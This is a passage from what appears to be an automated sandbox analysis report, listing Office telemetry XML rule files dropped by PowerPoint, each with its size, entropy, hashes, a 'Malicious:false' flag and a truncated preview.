                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63070" V="5" DC="SM" EN="Office.Identity.SignOutEvent" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns="">.. <S>.. <UTS T="1" Id="9zkiy" />.. <UTS T="2" Id="9zkix" />.. <A T="3" E="TelemetryShutdown" />.. </S>.. <C T="FT" I="0" O="false" N="FlowStartTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="FT" I="1" O="true" N="FlowEndTime">.. <S T="2" F="TimeStamp100ns" />.. </C>.. <C T="FT" I="2" O="true" N="SessionEndTime">.. <S T="3" F="TimeStamp100ns" />.. </C>.. <C T="G" I="3" O="true" N="IdentityUniqueID">.. <S T="1" F="IdentityMetadata_UniqueId" M="Ignore" />.. </C>.. <C T="W" I="4" O="true" N="IdentityProviderType">.. <S T="1" F="IdentityMetadata_IdentityProviderType" M="Ignore" />.. </C>.. <C T="W" I="5" O="true" N="IdentityErrorState">.. <S T="1" F="IdentityMetadata_IdentityErrorState" M="Ignore" />.. </C>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):420
                                                                                                                              Entropy (8bit):5.3337541139567035
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd4FV+d8WuXV2xAQ4WnerMZzsUINO2su:2d4FUenc8rERg
                                                                                                                              MD5:28E96F62E1BC96B5AD9254AABDC12DF3
                                                                                                                              SHA1:DE473F8E42A7A895B6AE4C474EC9CDD6D311D133
                                                                                                                              SHA-256:A175641DB8BA1360D362764E781E8D03AE2AA62777B8A99A217FAAD72FD3D93B
                                                                                                                              SHA-512:8D9624798A3C5F66BB62721F0135867CC564EAE090E24E89396A181C8D95A5D035595665301BA7532A44A7161B429145F35EE8663BE8BB1AE0286F0B82AFE822
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63071" V="0" DC="SM" EN="Office.Identity.SspiPromptCountWin32" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="aysrs" A="aysrt" />.. </S>.. <C T="TAG" I="0" O="false" N="PromptFlow">.. <S T="1" F="ULS_Tag" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1065
                                                                                                                              Entropy (8bit):5.100737631611683
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dR+UencIrD+rE19PqIpcc+QOEeQ6DnzB:cQUencIP+Q1CVEe3
                                                                                                                              MD5:613935084E49B765977B01FB2A3C9851
                                                                                                                              SHA1:0A35AEF5B74561DE3C2C12BCDE0A9DC4FECB4E6C
                                                                                                                              SHA-256:CF8F2042DD93DF63F5E2EBB8D5954A14569FAB28332A6458FD43B02284A1BCD9
                                                                                                                              SHA-512:7946F48422AB05A55A4F0B5E94DFB2821C5217D8537715765932C44C5199F69CD41D03557EB3A31410A081EBCD3AA58DC4E2D58E692CD7CEB5C71233F3D3B8C7
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63077" V="0" DC="SM" EN="Office.Identity.SignOutEventNoUserAction" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns="">.. <S>.. <UTS T="1" Id="bswsj" />.. <UTS T="2" Id="bswsk" />.. <A T="3" E="TelemetryShutdown" />.. </S>.. <C T="FT" I="0" O="false" N="FlowStartTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="FT" I="1" O="true" N="FlowEndTime">.. <S T="2" F="TimeStamp100ns" />.. </C>.. <C T="FT" I="2" O="true" N="SessionEndTime">.. <S T="3" F="TimeStamp100ns" />.. </C>.. <C T="G" I="3" O="true" N="IdentityUniqueID">.. <S T="1" F="IdentityMetadata_UniqueId" M="Ignore" />.. </C>.. <C T="W" I="4" O="true" N="IdentityProviderType">.. <S T="1" F="IdentityMetadata_IdentityProviderType" M="Ignore" />.. </C>.. <C T="W" I="5" O="true" N="IdentityErrorState">.. <S T="1" F="IdentityMetadata_IdentityErrorState" M="Ignore" />
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):374
                                                                                                                              Entropy (8bit):5.268171901132547
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBdHAkwD1VTcGfWVbKdq+HwWuXVUHperhhx7I7/USFNOn2sby:TMHd6iV+d8WuXViersUINO2su
                                                                                                                              MD5:7368CE965AB45B3860B60BBBA893ADA4
                                                                                                                              SHA1:9BB43FD94BDAFB7DAB4D72658655B2A8FDDA0A38
                                                                                                                              SHA-256:24CE4A51E7AE0762091D28BFD43EF841B90C3336068177AF3B5EFF455515EAB5
                                                                                                                              SHA-512:A74E86E5DEA97A53563FAA47CACD0637D4402C96E50655018FDF8ABBBA6CE4DD85C20F0C1B753CC7BE3F5713709A9EA555452BDECE58AFBCF10C4F461A8DFAB1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63078" V="0" DC="SM" EN="Office.Identity.ADALBrowserOverrideUsed" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="awuqr" />.. </S>.. <C T="TAG" I="0" O="false" N="Tag">.. <S T="1" F="ULS_Tag" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):798
                                                                                                                              Entropy (8bit):4.954992114837363
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdB+tV+d8WuXV4Wneruc1NQjEBzDpnAUiUI0AZr7p6OXHaSMNO5ABsu:2dB6UenQrjqOxAwhApVo
                                                                                                                              MD5:F2523204FD647D3E279FE62378B21AFF
                                                                                                                              SHA1:59B7092890EB27AD6923AE266B62539B3B7A8639
                                                                                                                              SHA-256:68E914309FBC15798124ED417BBB2387A60B9955E1065C5FAD21873E97075A39
                                                                                                                              SHA-512:95B5A91D343F8EE61EBF3A9EF5437BC1FC408838BBFA01D54035ED9F0551907560BD3B9FED28DBB52930B7F66302524F4E08DC50D1A7D1B6BCA8DF2960452034
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="65136" V="1" DC="SM" EN="Office.Identity.OfficeWebServiceApiGetService" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a9ief" />.. <TI T="2" I="Daily" />.. <A T="3" E="TelemetrySuspend" />.. <A T="4" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="1">.. <F N="ULS_Tag" />.. <F N="RequestStatus" />.. </S>.. </G>.. <C T="TAG" I="0" O="false" N="Tag">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="U64" I="1" O="false" N="RequestStatus">.. <S T="1" F="RequestStatus" />.. </C>.. <C T="U32" I="2" O="false" N="Count">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. <S T="4" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):418
                                                                                                                              Entropy (8bit):4.536516834264947
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdBqLOerPferLofSNahueIIKObNOcsu:2dBCrOrcqpOj
                                                                                                                              MD5:3DEC6741194F5F26700AF53E8DE76499
                                                                                                                              SHA1:C734E5D56ACEB9E6C60A1CFC8F6B53A2628ABA34
                                                                                                                              SHA-256:5545F763A13F123E02E8B093EBB550A24E12BDE55B606AFA908A946ACEB67B44
                                                                                                                              SHA-512:018FC159003389A82DD4A53693E19045363C04DA2569048D79486599264B32726DD147A2F34F88DFB0B9EE63E9BA328DBCFBED886EBCE34527D7FC0D1167EB4B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="65137" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="awu1i" />.. <UTS T="2" Id="awu0b" />.. <US T="3">.. <S T="1" />.. <S T="2" />.. </US>.. </S>.. <C T="TAG" I="0" O="false">.. <S T="3" F="ULS_Tag" />.. </C>.. <C T="U32" I="1" O="false">.. <S T="3" F="AuthScheme" />.. </C>.. <T>.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):760
                                                                                                                              Entropy (8bit):4.8747665284616675
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdBTTQV+d8WuXVic6NXFJjEQiiQ4WXyLi6yS5+xp6uRHfSMNOS5csu:2dBfQUenixvLXMY
                                                                                                                              MD5:255CE337CE314C2AADBFF46C6B040ACD
                                                                                                                              SHA1:F8DEEAB5F2D9D6E518C0288C063C6A4CDBC39A46
                                                                                                                              SHA-256:29BBEC150838AC2CC372A47ACD1B959F11520732BE93433B9D29F844B0D0C12C
                                                                                                                              SHA-512:5F45F8A99DBA3B54D7BA99F899E8B550620F23261081E119D661C9D8C1DF1F8C8CD662D13FB87CEF3CAF225A38D34577EA2C1ACDE57DF92CA897F9990BC8CDE0
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="65138" V="0" DC="SM" EN="Office.Identity.DetectAuthSchemeAggregate" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" DCa="PSU" xmlns="">.. <S>.. <TI T="1" I="Daily" />.. <A T="2" E="TelemetrySuspend" />.. <A T="3" E="TelemetryShutdown" />.. <R T="4" R="65137" />.. </S>.. <G>.. <S T="4">.. <F N="0" />.. <F N="1" />.. </S>.. </G>.. <C T="TAG" I="0" O="false" N="Tag">.. <S T="4" F="0" />.. </C>.. <C T="U32" I="1" O="false" N="AuthScheme">.. <S T="4" F="1" />.. </C>.. <C T="U32" I="2" O="false" N="CountOfAuthScheme">.. <C>.. <S T="4" />.. </C>.. </C>.. <T>.. <S T="1" />.. <S T="2" />.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):7761
                                                                                                                              Entropy (8bit):4.432562297734537
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:wxYYVY8ZfZmx7iFbRduRVqOqHs4g1RfafmEN/NGWguWQuTu6ctcGmkC+ACmseNi3:Lxm
                                                                                                                              MD5:FA609682FDD8FDA27E339A2E0F7B6CCC
                                                                                                                              SHA1:1982206E08F1AF90225B3AE3838A92F16DA781FA
                                                                                                                              SHA-256:9013FBA2419B964B03D2FD1F35423AFAA2EB9FC561A5FF005388F517131EC0FA
                                                                                                                              SHA-512:D1FA4A4B5585E583474C27C2DE24A417FD1689B63604AD632FBEB024C4FF3715600D4BB926FEAE0004788EB900799CF7FC37EDD86F55433E2820482F851007CB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="65139" V="0" DC="SM" EN="Office.Identity.HttpAutoDRequests" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="axidp" A="axic3 axib2" />.. <TI T="2" I="Daily" />.. <A T="3" E="TelemetrySuspend" />.. <A T="4" E="TelemetryShutdown" />.. <F T="5">.. <O T="EQ">.. <L>.. <S T="1" F="Url" />.. </L>.. <R>.. <V V="https://autodiscover.com.br/autodiscover/autodiscover.xml" T="W" />.. </R>.. </O>.. </F>.. <F T="6">.. <O T="EQ">.. <L>.. <S T="1" F="Url" />.. </L>.. <R>.. <V V="https://autodiscover.com.br/Autodiscover/Autodiscover.xml" T="W" />.. </R>.. </O>.. </F>.. <F T="7">.. <O T="EQ">.. <L>.. <S T="1" F="Url" />.. </L>.. <R>.. <V V="https://autodiscover.com.cn/autodiscover/autodiscover.xml" T="W
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):713
                                                                                                                              Entropy (8bit):4.466450204490182
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdqO7erKSer2tDpTW8/pTO91UWCf/0//XhmMdy9pSPqNO/HNUlu:2dqFrKFrQpi1J7
                                                                                                                              MD5:C7FE545E232CE595F6B090B01220E36B
                                                                                                                              SHA1:C080F5F0DA5898338FDF135C745B3A794CBFB8C4
                                                                                                                              SHA-256:3161BEFD82F8CD5065764B36D5CCDD028584E919D352624E45998E401C544B6D
                                                                                                                              SHA-512:76AFFC9EE1B6662B2A593EF072DEBBE4402471C145E6F0E39CB28F5CFA01A26481F90D9CAB69034C07007CB237B1F6AC5365A84C89F5E8C06A46D33ABB58ECA6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68000" V="3" DC="SM" T="Subrule" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="aw6j7" />.. <UTS T="2" Id="aw6ka" />.. </S>.. <G>.. <S T="1">.. <F N="queryId" />.. </S>.. <S T="2">.. <F N="queryId" />.. </S>.. </G>.. <C T="G" I="0" O="false">.. <S T="1" F="sessionId" />.. </C>.. <C T="U64" I="1" O="false">.. <O T="SUB">.. <L>.. <S T="2" F="TimeStamp100ns" />.. </L>.. <R>.. <S T="1" F="TimeStamp100ns" />.. </R>.. </O>.. </C>.. <C T="W" I="2" O="true">.. <S T="1" F="SearchScenario" M="Ignore" />.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):669
                                                                                                                              Entropy (8bit):4.471676286590207
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdDfKerd0er2YDpTW8/pTO91UWCf/0//XhmMdy9pSPqNOjsu:2dD1r5rLpi1F
                                                                                                                              MD5:BE8CED4F2595EF8B7304F023BA0F31B6
                                                                                                                              SHA1:B43595375C4C7AC613BCA293A8848547DE6B4B15
                                                                                                                              SHA-256:81C37B5CE5C160FFE497090C10BC93B0DC283FEEDC8A066587FF3CF26C498CB8
                                                                                                                              SHA-512:2EA89EDA242B74AF94107E224CCEE15E340EDF0FF8FB1D2845DD0B62245848EC340BE032C1F6CCFD0AC13312FA381909B48195AE2E21DA23F253525506D1A0C0
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68001" V="2" DC="SM" T="Subrule" DL="N" xmlns="">.. <S>.. <UTS T="1" Id="aw6ka" />.. <UTS T="2" Id="aw6kb" />.. </S>.. <G>.. <S T="1">.. <F N="queryId" />.. </S>.. <S T="2">.. <F N="queryId" />.. </S>.. </G>.. <C T="G" I="0" O="false">.. <S T="1" F="sessionId" />.. </C>.. <C T="U64" I="1" O="false">.. <O T="SUB">.. <L>.. <S T="2" F="TimeStamp100ns" />.. </L>.. <R>.. <S T="1" F="TimeStamp100ns" />.. </R>.. </O>.. </C>.. <C T="W" I="2" O="true">.. <S T="1" F="SearchScenario" M="Ignore" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2646
                                                                                                                              Entropy (8bit):4.887563027427744
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dd+corVPl6/+PNtFu3y7wIgUNZOrmzVBSl5OaFvg9OOygwAOOprrkXDirY6av:cd+7rPN6iP9pSnFvVZvUMyYzv
                                                                                                                              MD5:C2A97959022010DCC8AEFFA27D6B1520
                                                                                                                              SHA1:FF350517DB88567CF4055C7CDBA2996E00FF9C9F
                                                                                                                              SHA-256:54E3055B7E71BA49AC56E2FBAD33B73D17A520738BB56B011F733293542B7511
                                                                                                                              SHA-512:957EDF765D777AAC83EE6F6F33BF7E9E7D00FE20A3EA4043005C867C625827A5040CA7612110DB6F00EB7E98C2D2592958D36FB62F55E219482DA8FCC3C7C371
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68002" V="11" DC="SM" EN="Office.TellMe.TellMeD.RenderedResults" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="aw6ke" />.. </S>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="false" N="InteractionId">.. <S T="1" F="sessionId" />.. </C>.. <C T="G" I="2" O="false" N="QueryId">.. <S T="1" F="queryId" />.. </C>.. <C T="W" I="3" O="false" N="GroupName">.. <S T="1" F="groupName" />.. </C>.. <C T="W" I="4" O="false" N="ResultType">.. <S T="1" F="resultType" />.. </C>.. <C T="I32" I="5" O="false" N="GroupIndex">.. <S T="1" F="groupIndex" />.. </C>.. <C T="I32" I="6" O="false" N="ResultIndex">.. <S T="1" F="resultIndex" />.. </C>.. <C T="I32" I="7" O="false" N="DisplayIndex">.. <
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2338
                                                                                                                              Entropy (8bit):4.885655529573596
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:chohg74padkAmu8WsMHgzPC0bZsQuhDPpnp1VR4:Bhcd8Wsqg7C0bmNhzpnpHR4
                                                                                                                              MD5:818649C906021BFACDE1898C09ED0931
                                                                                                                              SHA1:63EDAB694DC90975F877590187DA388026E19971
                                                                                                                              SHA-256:05F4C3091C1C74333E55B8EB5F6D289180FA26B85CB9FFF44186E2819B42F49F
                                                                                                                              SHA-512:7E72AA678DD8BD2A2AABA73A727775D3C93DA39318CFE78CB0B8527D944E8A925E9243E017E08A1B67588DC19BD9FAC49E5C37A65AE12A29FF358A26ED13AD28
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68003" V="12" DC="SM" EN="Office.TellMe.TellMeD.SessionInfo" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="aw6j5" />.. <UTS T="2" Id="aw6j7" />.. <UTS T="3" Id="aw6j9" />.. <UTS T="4" Id="bx4at" />.. </S>.. <G>.. <S T="1">.. <F N="sessionId" />.. </S>.. <S T="2">.. <F N="sessionId" />.. </S>.. <S T="3">.. <F N="sessionId" />.. </S>.. <S T="4">.. <F N="sessionId" />.. </S>.. </G>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="3" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="false" N="TellMeSessionId">.. <S T="3" F="sessionId" />.. </C>.. <C T="G" I="2" O="true" N="TellMeQueryId">.. <S T="2" F="queryId" />.. </C>.. <C T="W" I="3" O="true" N="LastQuery">.. <V V="QUERYSCRUBBED" T="W" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2428
                                                                                                                              Entropy (8bit):4.928259864066492
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dSvcorQPl6X1xFihNGuc5FtNFOXqHVBSgNm5O2El/pu4xiVK48hYBY6+Kv:cSv7/WNTc5RFdSgBhuXK1UYkv
                                                                                                                              MD5:F8403DE9D6C43C3DD77AE60CA8B0AC8F
                                                                                                                              SHA1:D069A8181F531AFF3F73EC91CD1C8FFD19933B24
                                                                                                                              SHA-256:54622648A5151D792ED215FAEEB7773A2815AE10E61CE44394138DB40BB5537A
                                                                                                                              SHA-512:ADCD20B1A4FA779B3F204D816E4819067A59E54463935979D061792EEE90CA71A95508E9DDE4470E23775D6B9667D262832331E7747D4F27069D99325B126A64
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68004" V="16" DC="SM" EN="Office.TellMe.TellMeD.ExecutedCommand" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="a7m12" A="aw6j3" />.. </S>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="false" N="InteractionId">.. <S T="1" F="sessionId" />.. </C>.. <C T="G" I="2" O="false" N="QueryId">.. <S T="1" F="queryId" />.. </C>.. <C T="W" I="3" O="false" N="GroupName">.. <S T="1" F="groupName" />.. </C>.. <C T="I32" I="4" O="true" N="GroupIndex">.. <S T="1" F="groupIndex" M="Ignore" />.. </C>.. <C T="W" I="5" O="false" N="ResultType">.. <S T="1" F="resultType" />.. </C>.. <C T="I32" I="6" O="true" N="ResultBindingTcid">.. <S T="1" F="resultBindingTcid" M="Ignore" />.. </C>.. <C T="I32
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):504
                                                                                                                              Entropy (8bit):5.1531357207464
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBdDGk6SMQnTq3HwBUuNtEzrmRMFpAQ/GCHperhAjxPVC7LylnnqxtG0guynfC:TMHdDaPaEPAQXerMlVA64X9NO2su
                                                                                                                              MD5:931E99EA240799B79FACB265C1EBF3F9
                                                                                                                              SHA1:B19F24324699C8314D4D09F71904D4EAA1CE3EF1
                                                                                                                              SHA-256:9234790F9568447A80C59376706CE971522E7DDAB2390EA69A52D05EE8CF101C
                                                                                                                              SHA-512:CCE2A635181D7CC0F50F0B9049E4C18DF862D8BA02304463A3B2BAB0EDB63133D6C63E9637824E2FFAE0500B67784CF1B25C73AEBBE8B32F9F6D86C7CF0813C5
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68006" V="0" DC="SM" EN="Office.TellMe.TellMeD.StartSession" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="aw6j5" />.. </S>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="false" N="TellMeSessionId">.. <S T="1" F="sessionId" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):676
                                                                                                                              Entropy (8bit):5.12487732220577
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdfgoXLaEzerolVA64X9M93CCwrCfodVGTYPqNO2su:2dfT+XroPI8CzCsQYq
                                                                                                                              MD5:10FED5E39EFA5C3830D48A1F49E54A15
                                                                                                                              SHA1:936942D58A2456195154ED820F5CB3C1111825C0
                                                                                                                              SHA-256:319FC9370BEC9448C1154DA3F206AFC745D9EA3B4DCE9E2C5518DA487E034D3B
                                                                                                                              SHA-512:88CB5291FDE86310BCC30063728EEDD6C082C6FB8B638630C1FA7C51B9CB857A8ABFE70B28C031852734FD4CD5E7BF5DB822F3DF0EC3280F968C1B8F797AF36A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68008" V="4" DC="SM" EN="Office.TellMe.TellMeD.EndSessionWithQuery" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="aw6j9" />.. </S>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="false" N="TellMeSessionId">.. <S T="1" F="sessionId" />.. </C>.. <C T="U64" I="2" O="true" N="QueryLength">.. <S T="1" F="queryLength" M="Ignore" />.. </C>.. <C T="W" I="3" O="true" N="SearchScenario">.. <S T="1" F="SearchScenario" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1046
                                                                                                                              Entropy (8bit):5.0976719166954965
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd/zaEPAQAmderHco9lVA64X9Q4hlw0daXsfgtiEXQx4xGQq/jkdKOASNO2su:2d+corHPPIFHDe4e1Ka
                                                                                                                              MD5:B16B7061117958EB10F1675DEF3593AC
                                                                                                                              SHA1:39BDBAC0762FEF63A9DDAC5FCF23A7098107CCBB
                                                                                                                              SHA-256:5538B3A6B839AB5E7FB19FA4DF67CC49E199188FA65EFC48A4FE268CC91603CF
                                                                                                                              SHA-512:A2857812ED9677EA6D0D33EC93F864E68C247B65D02BACDEBE9F1CE2AB16150DC0F7B26832E02351ECF4146969570B3CD09D60F1223DC17B5B05ED642C205DE8
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68009" V="0" DC="SM" EN="Office.TellMe.TellMeD.HelpFlyoutClick" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="bik5q" A="bik5o" />.. </S>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="false" N="TellMeSessionId">.. <S T="1" F="sessionId" />.. </C>.. <C T="G" I="2" O="false" N="TellMeQueryId">.. <S T="1" F="queryId" />.. </C>.. <C T="W" I="3" O="false" N="AssistanceResultType">.. <S T="1" F="assistanceResultType" />.. </C>.. <C T="U64" I="4" O="true" N="ResultOrder">.. <S T="1" F="resultOrder" M="Ignore" />.. </C>.. <C T="U32" I="5" O="false" N="UserActionID">.. <V V="0" T="U32" />.. </C>.. <C T="W" I="6" O="false" N="UserActionName">.. <V V="TellMeD_HelpFlyoutClick" T="W" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1280
                                                                                                                              Entropy (8bit):4.973246245299416
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dQ+corHnrO6PIFHw5jQ10OODKOJKf+zRJ7:cQ+7DqVFTLGAkRJ7
                                                                                                                              MD5:ACFBD22304A94779B35D87A4FF8CFF99
